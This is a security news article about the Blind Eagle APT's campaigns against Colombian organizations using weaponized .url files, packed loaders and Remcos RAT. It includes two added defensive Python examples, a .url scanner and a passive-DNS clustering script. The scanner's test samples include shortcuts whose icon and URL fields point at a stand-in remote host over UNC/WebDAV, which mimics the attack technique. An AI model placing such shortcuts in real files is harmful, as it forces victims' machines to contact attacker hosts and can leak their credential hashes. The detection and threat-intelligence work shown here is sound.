Thursday, March 13, 2025

Blind Eagle Targets Organizations with Weaponized .URL Files to Steal User Hashes


In a significant development in the cybersecurity landscape, APT-C-36, more commonly known as Blind Eagle, has intensified its operations targeting Colombian governmental, financial, and critical infrastructure organizations.

Active since 2018, this Advanced Persistent Threat group has recently expanded its arsenal with sophisticated exploit techniques and malware, demonstrating an alarming ability to adapt to evolving security measures.

The threat actor has infected more than 1,600 victims in a single campaign, highlighting the scale and effectiveness of their operations.

Blind Eagle has demonstrated remarkable agility in incorporating new exploits into its attack methods.

On November 12, 2024, Microsoft patched a newly discovered vulnerability, CVE-2024-43451, which was being actively exploited in the wild using malicious .url files.

Within just six days of the patch release, Blind Eagle had already integrated a variant of this exploit into its attack arsenal.

This variant differs from the original exploit in that it doesn’t expose the NTLMv2 hash but instead serves as a notification mechanism for the threat actors when a targeted user downloads the malicious file.

The group’s ability to rapidly adapt to newly disclosed vulnerabilities underscores their technical sophistication and persistent threat capabilities.

The malicious .url files are particularly effective because they can trigger WebDAV requests on unpatched machines through unusual user interactions such as right-clicking, deleting, or dragging the file.

Even on patched systems, these files can still lead to malware infection if a user manually clicks on them.

Despite being in use for over two months, many of these .url files remain undetected by antivirus engines on VirusTotal, allowing Blind Eagle to maintain stealth in their operations.
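The article says the weaponized .url files work by making Windows reach out to an attacker-controlled host over WebDAV or SMB as soon as the shell touches the file. For a defender triaging mail attachments or quarantined files, the practical check is to parse the Internet Shortcut (INI-style) file and flag any field the shell resolves on its own that points at a remote host. The scanner below is an added example, not code from the article or from Check Point Research; the sample shortcut contents, the `example.invalid` host and the set of fields it inspects (`URL`, `IconFile`, `WorkingDirectory`) are my own assumptions about what to look at, not artifacts from the campaign.

```python
import configparser
import re
from urllib.parse import urlparse

# Fields of an Internet Shortcut that Explorer resolves without the user "opening" the
# shortcut; a UNC path or file:// URL here makes the shell contact the named host.
# (Assumed set of fields for this example.)
REMOTE_CAPABLE_KEYS = ("url", "iconfile", "workingdirectory")

# UNC path, optionally in the WebDAV form \\host@SSL\... or \\host@80\...
UNC_RE = re.compile(r"^\\\\([^\\@]+)(@ssl|@\d+)?\\", re.IGNORECASE)

# Constructed sample .url files for the demo; these are NOT the campaign's files.
SAMPLES = {
    "benign.url": "[InternetShortcut]\nURL=https://www.example.com/\n",
    "remote_icon.url": (
        "[InternetShortcut]\n"
        "URL=https://www.example.com/\n"
        "IconFile=\\\\example.invalid\\share\\icon.ico\n"
        "IconIndex=1\n"
    ),
    "webdav_url.url": (
        "[InternetShortcut]\n"
        "URL=\\\\example.invalid@80\\DavWWWRoot\\notificacion.pdf\n"
    ),
}


def parse_url_file(text):
    """Return the [InternetShortcut] section as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def remote_host(value):
    """Return the host a shortcut field would make Windows contact, or None if local."""
    v = value.strip()
    m = UNC_RE.match(v)
    if m:
        return m.group(1).lower()
    parsed = urlparse(v)
    if parsed.scheme.lower() == "file" and parsed.hostname:
        if parsed.hostname.lower() not in ("localhost", "127.0.0.1"):
            return parsed.hostname.lower()
    return None


def triage_url_file(text):
    """List (field, host) pairs for every remote-pointing field in one .url file."""
    fields = parse_url_file(text)
    findings = []
    for key in REMOTE_CAPABLE_KEYS:
        if key in fields:
            host = remote_host(fields[key])
            if host:
                findings.append((key, host))
    return findings


def scan(samples):
    """Map file name -> findings for every file that has at least one remote reference."""
    return {name: f for name, text in samples.items() if (f := triage_url_file(text))}


if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        for field, host in findings:
            print(f"{name}: field {field!r} points at remote host {host}")
```

Files the scanner flags are candidates for blocking outbound WebDAV/SMB to the named host and for checking proxy and firewall logs for earlier contact; a plain `https://` URL in the `URL` field, as in the benign sample, is not flagged because it only fires when the user deliberately opens the shortcut.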

The group’s tactics now include leveraging legitimate file-sharing platforms like Google Drive, Dropbox, GitHub, and Bitbucket to distribute their malware, further complicating detection efforts by security tools.

Campaign Infrastructure and Sophisticated Malware Chain

Between December 2024 and February 2025, Blind Eagle conducted multiple campaigns identified by internal codenames such as “socialismo,” “miami,” “PARAISO,” “marte,” and “saturno”.

Campaign socialismo attack chain.

These campaigns utilized a consistent attack chain: malicious .url files delivered via email (often through compromised Google Drive accounts) would download a HeartCrypt-packed malware.

This malware would then extract and inject a packed .NET loader into legitimate Windows processes like csc.exe, ultimately delivering a .NET Remote Access Trojan (RAT) that appears to be a variant of PureCrypter.

The technical sophistication continues throughout the attack chain. The .NET RAT collects detailed information about the victim’s system, including username, operating system version, installed antivirus, and machine specifications.

This data is then encrypted using AES and sent to command and control (C&C) servers with domain names that frequently change but often resolve to the same IP addresses.

In response, the C&C server provides a URL for downloading the final payload – typically Remcos RAT – which is hosted on GitHub or Bitbucket repositories maintained by the attackers.
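The observation that the C&C domain names change frequently but keep resolving to the same IP addresses is exactly the kind of pattern a threat-intel analyst pivots on: cluster passive-DNS records by resolved IP, and an address hosting a run of short-lived names stands out, while a single known domain leads to its siblings. The code below is an added example, not part of the article or of Check Point's research; the records, hostnames and documentation-range IP addresses are constructed for the demo and are not indicators from the campaign, and the thresholds (three domains, 14-day lifetime) are arbitrary choices for illustration.

```python
from collections import defaultdict
from datetime import date

# Constructed passive-DNS style records: (domain, resolved_ip, first_seen, last_seen).
# Hostnames and addresses are placeholders (RFC 5737 documentation ranges), not real IoCs.
RECORDS = [
    ("actualizacion-uno.example", "203.0.113.10", "2024-12-02", "2024-12-05"),
    ("actualizacion-dos.example", "203.0.113.10", "2024-12-06", "2024-12-09"),
    ("notificacion-tres.example", "203.0.113.10", "2024-12-10", "2024-12-14"),
    ("juzgado-cuatro.example", "203.0.113.10", "2025-01-03", "2025-01-08"),
    ("www.example.com", "198.51.100.5", "2019-04-01", "2025-02-20"),
    ("cdn.example.net", "198.51.100.7", "2024-12-01", "2024-12-03"),
]


def lifetime_days(first_seen, last_seen):
    """Number of days a domain was observed resolving (ISO date strings in, int out)."""
    return (date.fromisoformat(last_seen) - date.fromisoformat(first_seen)).days


def cluster_by_ip(records):
    """Group records by resolved IP: ip -> [(domain, lifetime_days), ...] in input order."""
    clusters = defaultdict(list)
    for domain, ip, first, last in records:
        clusters[ip].append((domain, lifetime_days(first, last)))
    return dict(clusters)


def flag_churn_ips(records, min_domains=3, max_lifetime=14):
    """IPs that hosted at least min_domains domains each alive for at most max_lifetime days.

    This is the 'rotating names on fixed hosting' pattern; thresholds are assumed values.
    """
    flagged = {}
    for ip, entries in cluster_by_ip(records).items():
        short_lived = [domain for domain, days in entries if days <= max_lifetime]
        if len(short_lived) >= min_domains:
            flagged[ip] = sorted(short_lived)
    return flagged


def related_domains(records, known_domain):
    """Pivot from one confirmed C&C domain to every other domain sharing its IPs."""
    ips = {ip for domain, ip, _, _ in records if domain == known_domain}
    return sorted({domain for domain, ip, _, _ in records
                   if ip in ips and domain != known_domain})


if __name__ == "__main__":
    for ip, domains in flag_churn_ips(RECORDS).items():
        print(f"{ip}: {len(domains)} short-lived domains -> {', '.join(domains)}")
    print("siblings of actualizacion-uno.example:",
          related_domains(RECORDS, "actualizacion-uno.example"))
```

In practice the records come from a passive-DNS provider rather than an inline list; the point of the pivot is that blocking or alerting on the stable IP (or hunting for any resolution to it in DNS logs) covers the next rotated domain before it is ever seen.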

Blind Eagle November until February Campaigns

Analysis of the GitHub repository “Oscarito20222/file” revealed that all repository updates were committed in the UTC-5 timezone, potentially indicating Blind Eagle’s origin in South American countries.

Blind Eagle GitHub account

This repository would be regularly updated with new malicious executables, then deleted after use, demonstrating the group’s operational security consciousness.

Notably, on February 25, 2025, the group accidentally uploaded an HTML file containing personally identifiable information (PII) from previous phishing activities, revealing their targeting of Colombian bank customers and confirming the focus on Colombian victims.

Severe Impact on Colombian Public and Private Sectors

The impact of Blind Eagle’s campaigns has been substantial, particularly on Colombian governmental organizations.

Based on filenames of malicious .url files, the group has been specifically targeting various Colombian justice system entities, including courts handling criminal cases, labor disputes, and security measures.

The malicious filenames mimic official legal communications, such as notifications of hearings, judicial complaints, and protective orders, exploiting the trust in governmental communications to increase the likelihood of victim interaction.

In the December 2024 “PARAISO” campaign alone, more than 1,600 Colombian systems were infected with Remcos RAT.

facturacioncol/fact Bitbucket repository.

Considering the targeted nature of APT groups like Blind Eagle, this infection rate is particularly significant and demonstrates their effectiveness.

The total infections across campaigns occurring over just one week in December approximated 9,000, revealing the extensive reach of their operations.

A data leak from the group’s operations exposed over 8,400 entries of personally identifiable information collected through phishing campaigns impersonating Colombian banks.

From the 1,634 identified email addresses, five belonged to Colombian government agencies, including the national police, tax authority, and comptroller’s office.

This indicates Blind Eagle’s persistent targeting of governmental entities alongside financial institutions and private citizens, creating a comprehensive threat to Colombia’s national security and economic stability.

Check Point Research, which has been monitoring Blind Eagle’s activities, notes that the group remains one of the most active and dangerous threat actors in Latin America.

Their rapid evolution, effective social engineering tactics, and focus on both public and private sector entities require organizations to implement proactive threat intelligence, advanced security defenses, and continuous monitoring to mitigate the risk posed by this adaptable adversary.


Kaaviya
Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.
